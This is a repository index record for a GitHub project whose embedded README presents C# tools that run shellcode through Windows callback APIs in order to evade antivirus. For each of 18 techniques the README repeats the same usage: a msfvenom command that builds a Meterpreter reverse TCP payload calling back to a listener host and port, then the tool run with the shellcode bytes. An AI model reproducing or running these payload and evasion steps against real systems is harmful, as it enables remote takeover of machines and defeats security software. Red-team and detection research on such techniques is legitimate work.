{"id":19144489,"url":"https://github.com/damonmohammadbagher/nativepayload_cbt","last_synced_at":"2025-04-15T17:47:14.894Z","repository":{"id":111035812,"uuid":"347425714","full_name":"DamonMohammadbagher/NativePayload_CBT","owner":"DamonMohammadbagher","description":"NativePayload_CallBackTechniques C# Codes (Code Execution via Callback Functions Technique, without CreateThread Native API)","archived":false,"fork":false,"pushed_at":"2023-06-07T02:59:14.000Z","size":2813,"stargazers_count":117,"open_issues_count":0,"forks_count":19,"subscribers_count":6,"default_branch":"main","last_synced_at":"2025-03-28T23:11:19.428Z","etag":null,"topics":["antivirus","antivirus-evasion","bypass-antivirus","csharp","pentesting","redteaming"],"latest_commit_sha":null,"homepage":"","language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/DamonMohammadbagher.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-03-13T16:50:11.000Z","updated_at":"2025-03-18T15:27:37.000Z","dependencies_parsed_at":"2024-11-09T07:36:45.972Z","dependency_job_id":"02b1c7e8-c5fb-4db9-bdd3-4983ebb72c12","html_url":"https://github.com/DamonMohammadbagher/NativePayload_CBT","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/DamonMohammadbagher%2FNativePayload_CBT","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/DamonMohammadbagher%2FNativePayload_CBT/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/DamonMohammadbagher%2FNativePayload_CBT/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/DamonMohammadbagher%2FNativePayload_CBT/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/DamonMohammadbagher","download_url":"https://codeload.github.com/DamonMohammadbagher/NativePayload_CBT/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":249124564,"owners_count":21216689,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["antivirus","antivirus-evasion","bypass-antivirus","csharp","pentesting","redteaming"],"created_at":"2024-11-09T07:35:10.763Z","updated_at":"2025-04-15T17:47:14.853Z","avatar_url":"https://github.com/DamonMohammadbagher.png","language":"C#","funding_links":[],"categories":[],"sub_categories":[],"readme":"# NativePayload_CBT \nNativePayload_CallBackTechniques C# Codes (Code Execution via Callback Functions, without CreateThread Native API)\u003cp\u003e\u003ca href=\"https://hits.seeyoufarm.com\"\u003e\u003cimg src=\"https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2FDamonMohammadbgher%2FNativePayload_CBT\"/\u003e\u003c/a\u003e\u003c/p\u003e\n-------------\nNote: These C# Codes Tested by .Net Framework 3.5 or 4.0 only ;) \u0026 some of Codes are ready but i will Publish almost all of them from S4R1N \u0026 ChaitanyaHaritash C++ repo soon...\n\nNote: These Useful Techniques made by Security Researcher \"@S4R1N\" also Codes [13,14,15] made by Security Researcher \"Chaitanya Haritash\"\n\nSpecial Thanks to \"S4R1N\" for Original C++ Source: https://github.com/S4R1N/AlternativeShellcodeExec\n\nSpecial Thanks to \"Chaitanya Haritash\" for Original C++ Source: https://github.com/ChaitanyaHaritash/Callback_Shellcode_Injection\n\nVideo: https://www.youtube.com/watch?v=k473K7lWc5Q\n\n--------------------------------------------\n\nMy article for Call/Invoke C# Async Codes/Methods via Native Callback Functions (NativePayload_AsyncM* Codes) \n\nLink1: https://damonmohammadbagher.github.io/Posts/29mar2021x.html\n\nLink2: https://www.linkedin.com/pulse/callinvoke-async-c-method-via-callback-function-apis-mohammadbagher/\n ```diff\n!    NativePayload_AsyncMethodEUILA.cs  (Async C# Method + EnumUILanguagesA)\n!    NativePayload_AsyncMEnumSystemLocalesA.cs  (Async C# Method + EnumSystemLocalesA)\n!    NativePayload_AsyncMEnumDisplayMonitors.cs  (Async C# Method + EnumDisplayMonitors)\n```\n\n--------------------------------------------\nC# Codes: \"New C# codes for Callback Functions will publish here soon...\"\n```diff\n+    1. NativePayload_ImageGetDigestStream.cs\n+    2. NativePayload_EnumWindows.cs\n+    3. NativePayload_EnumWindowStationsW.cs\n+    4. NativePayload_EnumResourceTypesW.cs\n+    5. NativePayload_EnumChildWindows.cs\n+    6. NativePayload_EnumDisplayMonitors.cs\n+    7. NativePayload_EnumPageFilesW.cs\n+    8. NativePayload_EnumPropsExW.cs\n+    9. NativePayload_EnumerateLoadedModules.cs\n+    10. NativePayload_CreateThreadPoolWait.cs\n+    11. NativePayload_CreateTimerQueueTimer.cs\n+    12. NativePayload_SymInitialize.cs\n+    13. NativePayload_EnumSystemCodePagesA.cs  (by ChaitanyaHaritash)\n+    14. NativePayload_EnumSystemLocalesA.cs  (by ChaitanyaHaritash)\n+    15. NativePayload_EnumUILanguagesA.cs  (by ChaitanyaHaritash)\n!    16. NativePayload_AsyncMethodEUILA.cs  (Async C# Method + EnumUILanguagesA)\n!    17. NativePayload_AsyncMEnumSystemLocalesA.cs  (Async C# Method + EnumSystemLocalesA)\n!    18. NativePayload_AsyncMEnumDisplayMonitors.cs  (Async C# Method + EnumDisplayMonitors)\n```\n--------------------------------------------\n   NativePayload_CBT.cs (Some of Callback Function Codes/Techniques in one code)\n   \nusage: \n    \n    step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c \u003e payload.txt\n    step2: [win] NativePayload_CBT.exe [1,2,3,4,5] [payload...]\n    Techniques: 1 =\u003e ImageGetDigestStream , 2 =\u003e EnumWindows , 3 =\u003e EnumWindowStationsW , 4 =\u003e EnumResourceTypesW , 5 =\u003e EnumChildWindows \n    example: NativePayload_CBT.exe 3 \"fc,48,00,87,00,....\"\n\n   ![](https://github.com/DamonMohammadbagher/NativePayload_CBT/blob/main/Pics/NativePayload_CBT.png)\n   \n--------------------------------------------\n\n1. NativePayload_ImageGetDigestStream.cs (Callback Functions Technique via ImageGetDigestStream Native API)\n \n usage: \n    \n    step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c \u003e payload.txt\n    step2: [win] NativePayload_ImageGetDigestStream.exe  [payload...]\n    example: NativePayload_ImageGetDigestStream.exe \"fc,48,00,87,00,....\"\n\n   ![](https://github.com/DamonMohammadbagher/NativePayload_CBT/blob/main/Pics/_CallBack_ImageGetDigestStream.png)\n\n -----------------------------------------------------------    \n2. NativePayload_EnumWindows.cs (Callback Functions Technique via EnumWindows Native API)\n \n usage: \n    \n    step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c \u003e payload.txt\n    step2: [win] NativePayload_EnumWindows.exe  [payload...]\n    example: NativePayload_EnumWindows.exe \"fc,48,00,87,00,....\"\n\n   ![](https://github.com/DamonMohammadbagher/NativePayload_CBT/blob/main/Pics/_CallBack_EnumWindows.png)\n\n --------------------------------------------    \n3. NativePayload_EnumWindowStationsW.cs (Callback Functions Technique via EnumWindowStationsW Native API)\n \n usage: \n    \n    step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c \u003e payload.txt\n    step2: [win] NativePayload_EnumWindowStationsW.exe  [payload...]\n    example: NativePayload_EnumWindowStationsW.exe \"fc,48,00,87,00,....\"\n\n   ![](https://github.com/DamonMohammadbagher/NativePayload_CBT/blob/main/Pics/_CallBack_EnumWindowStationW.png)\n   \n   --------------------------------------------    \n4. NativePayload_EnumResourceTypesW.cs (Callback Functions Technique via EnumResourceTypesW Native API)\n \n usage: \n    \n    step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c \u003e payload.txt\n    step2: [win] NativePayload_EnumResourceTypesW.exe  [payload...]\n    example: NativePayload_EnumResourceTypesW.exe \"fc,48,00,87,00,....\"\n\n   ![](https://github.com/DamonMohammadbagher/NativePayload_CBT/blob/main/Pics/_CallBack_EnumResourceTypesW.png)\n\n --------------------------------------------    \n5. NativePayload_EnumChildWindows.cs (Callback Functions Technique via EnumChildWindows Native API)\n \n usage: \n    \n    step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c \u003e payload.txt\n    step2: [win] NativePayload_EnumChildWindows.exe  [payload...]\n    example: NativePayload_EnumChildWindows.exe \"fc,48,00,87,00,....\"\n\n   ![](https://github.com/DamonMohammadbagher/NativePayload_CBT/blob/main/Pics/_CallBack_EnumChildWindows.png)\n\n --------------------------------------------    \n6. NativePayload_EnumDisplayMonitors.cs (Callback Functions Technique via EnumDisplayMonitors Native API)\n \n usage: \n    \n    step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c \u003e payload.txt\n    step2: [win] NativePayload_EnumDisplayMonitors.exe  [payload...]\n    example: NativePayload_EnumDisplayMonitors.exe \"fc,48,00,87,00,....\"\n\n   ![](https://github.com/DamonMohammadbagher/NativePayload_CBT/blob/main/Pics/_CallBack_EnumDisplayMonitors.png)\n\n --------------------------------------------    \n7. NativePayload_EnumPageFilesW.cs (Callback Functions Technique via EnumPageFilesW Native API)\n \n usage: \n    \n    step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c \u003e payload.txt\n    step2: [win] NativePayload_EnumPageFilesW.exe  [payload...]\n    example: NativePayload_EnumPageFilesW.exe \"fc,48,00,87,00,....\"\n\n   ![](https://github.com/DamonMohammadbagher/NativePayload_CBT/blob/main/Pics/_CallBack_EnumPageFilesW.png)\n\n --------------------------------------------   \n8. NativePayload_EnumPropsExW.cs (Callback Functions Technique via EnumPropsExW Native API)\n \n usage: \n    \n    step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c \u003e payload.txt\n    step2: [win] NativePayload_EnumPropsExW.exe  [payload...]\n    example: NativePayload_EnumPropsExW.exe \"fc,48,00,87,00,....\"\n\n   ![](https://github.com/DamonMohammadbagher/NativePayload_CBT/blob/main/Pics/_CallBack_EnumPropsExW.png)\n\n --------------------------------------------   \n 9. NativePayload_EnumerateLoadedModules.cs (Callback Functions Technique via EnumerateLoadedModules/W64 Native API)\n \n usage: \n    \n    step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c \u003e payload.txt\n    step2: [win] NativePayload_EnumerateLoadedModules.exe  [payload...]\n    example: NativePayload_EnumerateLoadedModules.exe \"fc,48,00,87,00,....\"\n\n   ![](https://github.com/DamonMohammadbagher/NativePayload_CBT/blob/main/Pics/_CallBack_EnumerateModulesLoaded_W64.png)\n\n --------------------------------------------   \n  10. NativePayload_CreateThreadPoolWait.cs (Callback Functions Technique via CreateThreadPoolWait Native API)\n \n usage: \n    \n    step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c \u003e payload.txt\n    step2: [win] NativePayload_CreateThreadPoolWait.exe  [payload...]\n    example: NativePayload_CreateThreadPoolWait.exe \"fc,48,00,87,00,....\"\n\n   ![](https://github.com/DamonMohammadbagher/NativePayload_CBT/blob/main/Pics/_CallBack_CreateThreadPoolWait.png)\n\n --------------------------------------------   \n  11. NativePayload_CreateTimerQueueTimer.cs (Callback Functions Technique via CreateTimerQueueTimer Native API)\n \n usage: \n    \n    step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c \u003e payload.txt\n    step2: [win] NativePayload_CreateTimerQueueTimer.exe  [payload...]\n    example: NativePayload_CreateTimerQueueTimer.exe \"fc,48,00,87,00,....\"\n\n   ![](https://github.com/DamonMohammadbagher/NativePayload_CBT/blob/main/Pics/_CallBack_CreateTimerQueueTimer.png)\n\n --------------------------------------------   \n  12. NativePayload_SymInitialize.cs (Callback Functions Technique via SymInitialize Native API)\n \n usage: \n    \n    step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c \u003e payload.txt\n    step2: [win] NativePayload_SymInitialize.exe  [payload...]\n    example: NativePayload_SymInitialize.exe \"fc,48,00,87,00,....\"\n\n   ![](https://github.com/DamonMohammadbagher/NativePayload_CBT/blob/main/Pics/_CallBack_SymInitialize.png)\n   \n --------------------------------------------   \n   13. NativePayload_EnumSystemCodePagesA.cs (Callback Functions Technique via EnumSystemCodePagesA Native API)\n \n usage: \n    \n    step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c \u003e payload.txt\n    step2: [win] NativePayload_EnumSystemCodePagesA.exe  [payload...]\n    example: NativePayload_EnumSystemCodePagesA.exe \"fc,48,00,87,00,....\"\n\n   ![](https://github.com/DamonMohammadbagher/NativePayload_CBT/blob/main/Pics/_CallBack_EnumSystemCodePagesA.png)\n   \n --------------------------------------------   \n   14. NativePayload_EnumSystemLocalesA.cs (Callback Functions Technique via EnumSystemLocalesA Native API)\n \n usage: \n    \n    step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c \u003e payload.txt\n    step2: [win] NativePayload_EnumSystemLocalesA.exe  [payload...]\n    example: NativePayload_EnumSystemLocalesA.exe \"fc,48,00,87,00,....\"\n\n   ![](https://github.com/DamonMohammadbagher/NativePayload_CBT/blob/main/Pics/_CallBack_EnumSystemLocalesA.png)\n   \n --------------------------------------------   \n   15. NativePayload_EnumUILanguagesA.cs (Callback Functions Technique via EnumUILanguagesA Native API)\n \n usage: \n    \n    step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c \u003e payload.txt\n    step2: [win] NativePayload_EnumUILanguagesA.exe  [payload...]\n    example: NativePayload_EnumUILanguagesA.exe \"fc,48,00,87,00,....\"\n\n   ![](https://github.com/DamonMohammadbagher/NativePayload_CBT/blob/main/Pics/_CallBack_EnumUILanguagesA.png)\n   \n --------------------------------------------   \n   16. NativePayload_AsyncMethodEUILA.cs (Callback Functions Technique via EnumUILanguagesA API + Async Csharp Method)\n   \n   Note: it means we can use Callback Native API functions to Invoke C# Codes/Methods (like async call) etc.\n \n usage: \n    \n    step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c \u003e payload.txt\n    step2: [win] NativePayload_AsyncMethodEUILA.exe  [payload...]\n    example: NativePayload_AsyncMethodEUILA.exe \"fc,48,00,87,00,....\"\n\n   ![](https://github.com/DamonMohammadbagher/NativePayload_CBT/blob/main/Pics/_CallBack_AsyncMethodEUILA.png)\n   \n --------------------------------------------   \n   17. NativePayload_AsyncMEnumSystemLocalesA.cs (Callback Functions Technique via EnumSystemLocalesA API + Async Csharp Method)\n   \n   Note: it means we can use Callback Native API functions to Invoke C# Codes/Methods (like async call) etc.\n \n usage: \n    \n    step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c \u003e payload.txt\n    step2: [win] NativePayload_AsyncMEnumSystemLocalesA.exe  [payload...]\n    example: NativePayload_AsyncMEnumSystemLocalesA.exe \"fc,48,00,87,00,....\"\n\n   ![](https://github.com/DamonMohammadbagher/NativePayload_CBT/blob/main/Pics/_CallBack_AsyncMEnumSystemLocalesA.png)\n   \n --------------------------------------------   \n   18. NativePayload_AsyncMEnumDisplayMonitors.cs (Callback Functions Technique via EnumDisplayMonitors API + Async Csharp Method)\n   \n   Note: it means we can use Callback Native API functions to Invoke C# Codes/Methods (like async call) etc.\n \n usage: \n    \n    step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c \u003e payload.txt\n    step2: [win] NativePayload_AsyncMEnumDisplayMonitors.exe  [payload...]\n    example: NativePayload_AsyncMEnumDisplayMonitors.exe \"fc,48,00,87,00,....\"\n\n   ![](https://github.com/DamonMohammadbagher/NativePayload_CBT/blob/main/Pics/_CallBack_ASyncMEnumDisplayMonitors.png)\n   \n --------------------------------------------   \n    \n\n \n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdamonmohammadbagher%2Fnativepayload_cbt","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdamonmohammadbagher%2Fnativepayload_cbt","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdamonmohammadbagher%2Fnativepayload_cbt/lists"}